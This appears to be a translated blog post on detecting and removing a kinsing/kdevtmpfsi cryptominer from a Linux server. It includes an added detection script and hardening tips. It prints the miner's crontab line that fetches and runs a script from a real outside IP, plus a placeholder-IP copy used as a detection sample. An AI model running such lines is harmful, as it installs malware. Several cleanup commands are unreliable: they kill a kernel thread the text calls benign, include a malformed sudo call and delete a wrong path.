Cleaning up a cryptomining program
Reproducing the problem
No resource-hungry processes had been started, yet the 4G of memory was nearly full and CPU usage was high, so it was fairly safe to conclude that a mining program was running.
The situation was as follows:
[mym@bigdata01 software]$ free -h
total used free shared buff/cache available
Mem: 3.9G 2.5G 168M 217M 1.2G 924M
Swap: 0B 0B 0B
[mym@bigdata01 software]$ jps
29218 Jps
[mym@bigdata01 software]$ top
top - 17:19:17 up 30 days, 23:51, 1 user, load average: 12.61, 13.41, 13.81
Tasks: 903 total, 2 running, 130 sleeping, 0 stopped, 771 zombie
%Cpu(s): 99.2 us, 0.8 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4045104 total, 143448 free, 2645876 used, 1255780 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 945508 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
17154 mym 20 0 306132 269120 8 S 36.5 6.7 143:19.32 bash64
18993 mym 20 0 306132 269188 8 S 36.2 6.7 142:32.41 bash64
26095 mym 20 0 306136 269192 8 S 36.2 6.7 135:38.88 bash64
15594 mym 20 0 306136 269316 0 S 34.9 6.7 218:41.81 bash64
25774 mym 20 0 306136 269192 8 S 34.9 6.7 135:54.86 bash64
11389 mym 20 0 515392 265248 304 S 17.8 6.6 100:56.52 kdevtmpfsi
1149 root 39 19 301424 9116 1384 S 0.7 0.2 25:36.01 bcm-si
5024 mym 20 0 2279520 296732 0 S 0.7 7.3 54:55.15 java
15399 root 20 0 1399044 36028 4512 S 0.7 0.9 308:53.32 hosteye
4647 mym 20 0 2084548 175492 4028 S 0.3 4.3 15:24.83 java
5207 mym 20 0 2128716 245724 3068 S 0.3 6.1 28:51.30 java
10684 mym 20 0 256 96 0 S 0.3 0.0 0:18.55 124d1142x41u2ua
31075 mym 20 0 162784 3108 1580 R 0.3 0.1 0:00.27 top
1 root 20 0 125628 2980 1452 S 0.0 0.1 9:48.28 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.11 kthreadd
4 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H
6 root 20 0 0 0 0 S 0.0 0.0 5:11.03 ksoftirqd/0
7 root rt 0 0 0 0 S 0.0 0.0 0:10.89 migration/0
8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rcu_bh
9 root 20 0 0 0 0 S 0.0 0.0 7:38.80 rcu_sched
10 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 lru-add-drain
11 root rt 0 0 0 0 S 0.0 0.0 0:13.77 watchdog/0
12 root rt 0 0 0 0 S 0.0 0.0 0:10.37 watchdog/1
13 root rt 0 0 0 0 S 0.0 0.0 0:09.20 migration/1
14 root 20 0 0 0 0 S 0.0 0.0 43:35.45 ksoftirqd/1
16 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/1:0H
18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs
19 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 netns
20 root 20 0 0 0 0 S 0.0 0.0 0:02.20 khungtaskd
21 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 writeback
There were a pile of processes; among them kdevtmpfsi, kinsing and the like are the mining processes.
[mym@bigdata01 software]$ ps -aux | grep kinsing
mym 31234 0.0 0.6 119428 24528 ? Sl 11:00 0:03 /var/tmp/kinsing
mym 32336 0.0 0.0 112708 960 pts/0 R+ 17:21 0:00 grep --color=auto kinsing
[mym@bigdata01 software]$ ps -aux | grep kdevtmp
root 18 0.0 0.0 0 0 ? S Mar22 0:00 [kdevtmpfs]
mym 11389 21.6 6.5 515392 265248 ? Ssl 09:32 101:18 /tmp/kdevtmpfsi
mym 32411 0.0 0.0 112712 960 pts/0 S+ 17:21 0:00 grep --color=auto kdevtmp
I had no cron jobs of my own, but checking crontab showed the miner's scheduled jobs there too, so this has to be cleaned up as well.
[mym@bigdata01 software]$ crontab -l
*/1 * * * * export DISPLAY=:0 && /home/mym/.tmp00/bash >/dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1
Cleanup
Kill the mining-related processes. Note that in the ps output above PID 18 is [kdevtmpfs], a root-owned kernel thread with a bracketed name, not the miner; the miner processes are the mym-owned 31234 (kinsing) and 11389 (kdevtmpfsi).
[mym@bigdata01 software]$ kill -9 31234 18 11389
Remove the cron jobs
[mym@bigdata01 software]$ crontab -r
Delete the processes' temporary files
[mym@bigdata01 software]$ cd /tmp
[mym@bigdata01 tmp]$ ls
hsperfdata_mym hsperfdata_root kdevtmpfsi linux.lock
[mym@bigdata01 tmp]$ sudo rm -rf kdevtmpfsi
[mym@bigdata01 tmp]$ ls /var/tmp
abrt for kinsing yum-mym-7oRfv9
[mym@bigdata01 tmp]$ sudo -rf /var/tmp/kinsing
Do another global search to check nothing was missed
[mym@bigdata01 tmp]$ sudo find / -name kinsing
/var/tmp/kinsing
[mym@bigdata01 tmp]$ sudo find / -name kdevtmpfsi
/tmp/kdevtmpfsi
[mym@bigdata01 tmp]$ rm -rf /var/tmp/kinsing
[mym@bigdata01 tmp]$ rm -rf /var/tmp/kdevtmpfsi
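As an added example (not part of the original post), a small POSIX shell script that turns the checks above into reusable filters: ps lines whose command runs from /tmp, /var/tmp or /dev/shm or carries the kinsing/kdevtmpfsi names, and crontab lines that pipe a downloaded script into sh or call something from a temp or hidden directory. The sample input is constructed from this post's own ps and crontab output; the function names and the documentation-range placeholder IP are my assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: two filters for the indicators
# seen in this incident plus a live wrapper. Sample input is constructed from
# the post's ps/crontab output, with a documentation-range placeholder host.

# Flag crontab lines that pipe wget/curl output into a shell, or that run
# something from /tmp, /var/tmp, /dev/shm or a hidden directory under /home.
# Reads stdin (or the files given); exit status 0 means something was flagged.
suspicious_cron() {
    grep -E \
        -e '(wget|curl)[^|]*[|][[:space:]]*(ba)?sh' \
        -e '(^|[[:space:]&;])(/tmp|/var/tmp|/dev/shm|/home/[^/]+/\.)' "$@"
}

# Flag `ps aux` lines whose command (field 11) runs out of a temp directory
# or matches the miner names seen here. The kernel's own [kdevtmpfs] thread
# is deliberately not matched: its name is bracketed and lacks the final "i".
suspicious_ps() {
    awk 'NR > 1 && ($11 ~ /^\/(tmp|var\/tmp|dev\/shm)\// ||
                    $11 ~ /(^|\/)(kinsing|kdevtmpfsi)$/)' "$@"
}

# Run the checks on the host this script is on (needs ps, crontab and /proc).
live_check() {
    echo "== processes running from temp dirs or matching known miner names =="
    ps aux | suspicious_ps
    echo "== cron entries of $(id -un) that fetch-and-run or use temp/hidden paths =="
    crontab -l 2>/dev/null | suspicious_cron || true
    echo "== running processes whose binary was deleted from disk =="
    ls -l /proc/[0-9]*/exe 2>/dev/null | grep '(deleted)' || true
}

# Constructed samples (taken from the post, with a placeholder download host).
SAMPLE_CRON='*/1 * * * * export DISPLAY=:0 && /home/mym/.tmp00/bash >/dev/null 2>&1
* * * * * wget -q -O - http://198.51.100.7/h2.sh | sh > /dev/null 2>&1
0 2 * * * /usr/bin/find /var/log -name "*.gz" -mtime +30 -delete'
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 18 0.0 0.0 0 0 ? S Mar22 0:00 [kdevtmpfs]
mym 31234 0.0 0.6 119428 24528 ? Sl 11:00 0:03 /var/tmp/kinsing
mym 11389 21.6 6.5 515392 265248 ? Ssl 09:32 101:18 /tmp/kdevtmpfsi
mym 5024 0.7 7.3 2279520 296732 ? Sl 09:00 54:55 java -jar app.jar'

if [ "${1:-}" = "--live" ]; then
    live_check
else
    echo "--- suspicious cron lines in the sample ---"
    printf '%s\n' "$SAMPLE_CRON" | suspicious_cron
    echo "--- suspicious processes in the sample ---"
    printf '%s\n' "$SAMPLE_PS" | suspicious_ps
fi
```

Run it with `--live` to check the current host; without arguments it only exercises the constructed samples, flagging the two cron lines and the two miner processes but not the benign find job or the kernel's [kdevtmpfs] thread.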
Prevention
- Prevention comes down to configuring security groups carefully: allow as little inbound traffic as possible and open only the ports you really need, or put a jump host in front.
- Log in with SSH keys.
- Change all default ports, e.g. SSH's 22, MySQL's 3306, Redis's 6379 and so on.
- Add a password or access control wherever one can be set. It is a hassle, but there is no way around it if you want to be as secure as possible.